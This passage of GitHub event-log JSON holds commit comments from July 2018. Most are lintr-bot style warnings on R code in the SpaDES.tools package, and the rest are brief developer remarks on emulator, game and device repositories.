FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:886:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread2.R#L886) *style:* **Lines should not be more than 100 characters.**\n```r\n​                      spreadProb = 0.23, persistProb = 0.8, iterations = 10, directions = 8L, plot.it = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:891:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread2.R#L891) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  M <- matrix(0.8, nrow = 50, ncol = 50)\n  ^\n```\n[tests/testthat/test-spread2.R:898:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread2.R#L898) *style:* **Put spaces around all infix operators.**\n```r\n​  start <- c(50, length(landscape)-49)\n                                 ~^~\n```\n[tests/testthat/test-spread2.R:902:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread2.R#L902) *style:* **Lines should not be more than 100 characters.**\n```r\n​                        spreadProb = 0.23, persistProb = persistRas, iterations = 10, directions = 8L,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:916:14:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread2.R#L916) *style:* **Use <-, not =, for assignment.**\n```r\n​  spreadProb = landscape\n             ^\n```\n[tests/testthat/test-spread2.R:918:72:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread2.R#L918) *style:* **Commas should always have a space after.**\n```r\n​  expect_silent(spread2(landscape = landscape, spreadProb = spreadProb,start = start,\n                                                                       ^\n```"}},"created_at":"2018-07-14T13:48:34Z"}
{"id":"7965811145","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29709359,"position":null,"line":null,"path":null,"commit_id":"2d3fd59e049a0b3a334ad47465ef4c392864dd29","created_at":"2018-07-14T13:49:48Z","updated_at":"2018-07-14T13:49:48Z","author_association":"OWNER","body":"Yes, it's just disabling the fixNaN function for now. "}},"created_at":"2018-07-14T13:49:48Z"}
{"id":"7965813267","type":"CommitCommentEvent","actor":{"login":"teamraw"},"repo":{"name":"lettuce-oreo/android_device_yu_lettuce"},"payload":{"comment":{"id":29709362,"position":null,"line":null,"path":null,"commit_id":"23d00e79a73f276079bac52645dfbf371e1259c5","created_at":"2018-07-14T13:51:26Z","updated_at":"2018-07-14T13:51:26Z","author_association":"CONTRIBUTOR","body":"@Abhinavgupta371 teri mai aag kyun lagi bai \r\ntere se baat kon kar rha hai"}},"created_at":"2018-07-14T13:51:26Z"}
{"id":"7965813645","type":"CommitCommentEvent","actor":{"login":"ronancpl"},"repo":{"name":"ronancpl/HeavenMS"},"payload":{"comment":{"id":29709363,"position":5,"line":53,"path":"scripts/npc/1032001.js","commit_id":"94425ba616dacf61b156044ac3993e2d06584c8f","created_at":"2018-07-14T13:51:45Z","updated_at":"2018-07-14T13:51:45Z","author_association":"OWNER","body":"It is. There's actually a mistake on line 53, where the string should say \"until you reach level 8, ...\". Thanks for pointing that section!"}},"created_at":"2018-07-14T13:51:45Z"}
{"id":"7965815835","type":"CommitCommentEvent","actor":{"login":"lrinQVQ"},"repo":{"name":"googlehosts/hosts"},"payload":{"comment":{"id":29709374,"position":null,"line":null,"path":null,"commit_id":"69ef4d8a67ad267fd3594ac8cc992719ec6b5d77","created_at":"2018-07-14T13:53:31Z","updated_at":"2018-07-14T13:53:31Z","author_association":"CONTRIBUTOR","body":"fix https://github.com/googlehosts/hosts/issues/230"}},"created_at":"2018-07-14T13:53:31Z"}
{"id":"7965816307","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709380,"position":null,"line":null,"path":null,"commit_id":"593233da96ea89bbb01e29790f1498c04533039a","created_at":"2018-07-14T13:53:49Z","updated_at":"2018-07-14T13:53:49Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-7](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-7).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-7-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T13:53:49Z"}
{"id":"7965817540","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29709384,"position":54,"line":54,"path":"5 File","commit_id":"294b145ffcc458893157efd8d1035761a2e2a47c","created_at":"2018-07-14T13:54:48Z","updated_at":"2018-07-14T13:54:48Z","author_association":"OWNER","body":"### Print progress bar:\r\n```\r\n#Downtiser\r\nimport sys,time\r\n\r\nfor i in range(40):\r\n    sys.stdout.write('#')\r\n    sys.stdout.flush()\r\n    time.sleep(0.3)\r\n\r\n```"}},"created_at":"2018-07-14T13:54:48Z"}
{"id":"7965817692","type":"CommitCommentEvent","actor":{"login":"GoogleFrog"},"repo":{"name":"ZeroK-RTS/Zero-K"},"payload":{"comment":{"id":29709386,"position":null,"line":null,"path":null,"commit_id":"75b47e8cfd73893cd3e167085242107cc3f55f04","created_at":"2018-07-14T13:54:57Z","updated_at":"2018-07-14T13:54:57Z","author_association":"CONTRIBUTOR","body":"This is a regression in a sense. Around the time of Steam release I made the hotkeys for control groups configurable in epicmenu. At this time I removed the harcoded 0-9 keypress detection from all default widgets and replaced it with hotkey detection. I forget exactly how.\r\n\r\nThis change should support rebindable control groups. Also the function name 'IsNumberKeyPressed' should say what it is for, instead of what it often does."}},"created_at":"2018-07-14T13:54:57Z"}
{"id":"7965817708","type":"CommitCommentEvent","actor":{"login":"EtchedPixels"},"repo":{"name":"EtchedPixels/FUZIX"},"payload":{"comment":{"id":29709387,"position":null,"line":null,"path":null,"commit_id":"1d6997ba137a58a8a7f8f60ef37851a7dbbf99e5","created_at":"2018-07-14T13:54:58Z","updated_at":"2018-07-14T13:54:58Z","author_association":"OWNER","body":"That gets quite long, and the Linux ps doesn't do that either.\r\n"}},"created_at":"2018-07-14T13:54:58Z"}
{"id":"7965817888","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"wayne-develop/device_xiaomi_wayne"},"payload":{"comment":{"id":29709392,"position":null,"line":null,"path":null,"commit_id":"dd3258a5aa6c7832f07bafeb058243b6a3654bcf","created_at":"2018-07-14T13:55:08Z","updated_at":"2018-07-14T13:55:08Z","author_association":"NONE","body":"O.o who are you"}},"created_at":"2018-07-14T13:55:08Z"}
{"id":"7965818058","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"wayne-develop/device_xiaomi_wayne"},"payload":{"comment":{"id":29709394,"position":null,"line":null,"path":null,"commit_id":"dd3258a5aa6c7832f07bafeb058243b6a3654bcf","created_at":"2018-07-14T13:55:14Z","updated_at":"2018-07-14T13:55:14Z","author_association":"NONE","body":"chinese?"}},"created_at":"2018-07-14T13:55:14Z"}
{"id":"7965820368","type":"CommitCommentEvent","actor":{"login":"qaisjp"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29709403,"position":null,"line":null,"path":null,"commit_id":"0a7a28a5a66cc5712f296a3b404ce9f1a4510216","created_at":"2018-07-14T13:56:57Z","updated_at":"2018-07-14T13:56:57Z","author_association":"MEMBER","body":"https://github.com/multitheftauto/mtasa-blue/pull/195"}},"created_at":"2018-07-14T13:56:57Z"}
{"id":"7965822754","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.tools"},"payload":{"comment":{"id":29709410,"position":null,"line":null,"path":null,"commit_id":"efd60db0c828812e50332857434b2bc2727c0da4","created_at":"2018-07-14T13:58:52Z","updated_at":"2018-07-14T13:58:52Z","author_association":"NONE","body":"[inst/examples/example_distanceFromEachPoint.R:37:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/inst/examples/example_distanceFromEachPoint.R#L37) *style:* **Commented code should be removed.**\n```r\n​#beginCluster(3) # can do parallel\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_distanceFromEachPoint.R:40:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/inst/examples/example_distanceFromEachPoint.R#L40) *style:* **Commented code should be removed.**\n```r\n​#endCluster() # if beginCluster was run\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:82:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L82) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( method != \"RMexp\") {\n        ^\n```\n[R/initialize.R:237:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  X <- c(jitter(sort(rbeta(nPoints, betaPar, betaPar) * (maxX - minX) + minX)),\n  ^\n```\n[R/initialize.R:239:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L239) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Y <- c(jitter(sort(rbeta(nPoints / 2, betaPar, betaPar) * (maxY - meanY) + meanY)),\n  ^\n```\n[R/initialize.R:243:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L243) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Sr1 <- Polygon(cbind(X + xAdd, Y + yAdd))\n  ^~~\n```\n[R/initialize.R:244:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L244) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Srs1 <- Polygons(list(Sr1), \"s1\")\n  ^~~~\n```\n[R/initialize.R:341:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L341) *style:* **Commented code should be removed.**\n```r\n​# ### INCORPORATE RELEVANT PARTS OF THIS OLD INIT FUNCTION INTO INITCOORDS()\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:346:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L346) *style:* **Commented code should be removed.**\n```r\n​# #'                      (currently only \\code{RasterLayer} or\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:347:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L347) *style:* **Commented code should be removed.**\n```r\n​# #'                      \\code{SpatialPolygonsDataFrame}) accepted.\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:357:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L357) *style:* **Commented code should be removed.**\n```r\n​#     ext <- extent(agentlocation)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:359:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L359) *style:* **Commented code should be removed.**\n```r\n​#       #            nonNAs <- !is.na(getvalue(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:360:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L360) *style:* **Commented code should be removed.**\n```r\n​#       nonNAs <- !is.na(getValues(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:361:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L361) *style:* **Commented code should be removed.**\n```r\n​#       wh.nonNAs <- which(nonNAs)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:362:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L362) *style:* **Commented code should be removed.**\n```r\n​#       #            ProbInit.v <- cumsum(getvalue(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:363:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L363) *style:* **Commented code should be removed.**\n```r\n​#       ProbInit.v <- cumsum(getValues(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:365:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L365) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(numagents,0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:366:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L366) *style:* **Commented code should be removed.**\n```r\n​#         fI <- findInterval(ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:367:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L367) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[fI]\n          ^~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:368:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L368) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(numagents,0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:369:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L369) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:370:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L370) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:372:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L372) *style:* **Commented code should be removed.**\n```r\n​#         #                va <- getvalue(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:373:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L373) *style:* **Commented code should be removed.**\n```r\n​#         va <- getValues(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:374:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L374) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(length(va), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:375:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L375) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:377:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L377) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(length(fI2), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:378:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L378) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v) + 1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:379:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L379) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:381:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L381) *style:* **Commented code should be removed.**\n```r\n​#         #                last.ran <- runif(length(fI2),0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:382:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L382) *style:* **Commented code should be removed.**\n```r\n​#         #                last.fI2 <- wh.nonNAs[last.ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:385:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L385) *style:* **Commented code should be removed.**\n```r\n​#         position <- xyFromCell(agentlocation,fI2,spatial = TRUE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:387:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L387) *style:* **Commented code should be removed.**\n```r\n​#         position <- coordinates(agentlocation)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:389:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L389) *style:* **Commented code should be removed.**\n```r\n​#         stop(\"need raster layer or Spatial Points object\")\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:391:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L391) *style:* **Commented code should be removed.**\n```r\n​#       numagents <- length(position)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:399:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L399) *style:* **Commented code should be removed.**\n```r\n​#           colnames(xy) = c(\"x\", \"y\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:400:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L400) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(xy)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:401:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L401) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(sampleRandom(agentlocation, numagents, xy = TRUE, sp = TRUE))\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:403:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L403) *style:* **Commented code should be removed.**\n```r\n​#           sam <- sample(1:length(agentlocation),numagents)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:404:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L404) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation[sam,])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:406:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L406) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:413:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L413) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:415:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L415) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:417:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L417) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:425:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L425) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:429:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L429) *style:* **Commented code should be removed.**\n```r\n​#     stop(\"Need to provide agentlocation, which can be a map layer\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:431:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L431) *style:* **Commented code should be removed.**\n```r\n​#   heading1 <- runif(numagents, 0, 360)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:432:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L432) *style:* **Commented code should be removed.**\n```r\n​#   distance <- runif(numagents, 0.1, 10)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:434:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L434) *style:* **Commented code should be removed.**\n```r\n​#   .Object@ID <- as.character(1:numagents)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:435:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L435) *style:* **Commented code should be removed.**\n```r\n​#   .Object@spatial <- position\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:436:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L436) *style:* **Commented code should be removed.**\n```r\n​#   .Object@heading <- heading1\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:437:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L437) *style:* **Commented code should be removed.**\n```r\n​#   .Object@distance <- distance\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:439:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/initialize.R#L439) *style:* **Commented code should be removed.**\n```r\n​#   return(.Object)\n    ^~~~~~~~~~~~~~~\n```\n[R/mapReduce.R:53:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/mapReduce.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  BsumVec <- reduced[fullRasterVals] # join\n  ^~~~~~~\n```\n[R/neighbourhood.R:112:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L112) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​adj.raw <- function(x = NULL, cells, directions = 8, sort = FALSE, pairs = TRUE,\n^~~~~~~\n```\n[R/neighbourhood.R:114:21:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                    ^~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:114:45:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                                            ^~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:233:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L233) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:238:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L238) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:297:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L297) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((from %% numCol + to %% numCol) == 1))# | #right & left edge cells, with neighbours 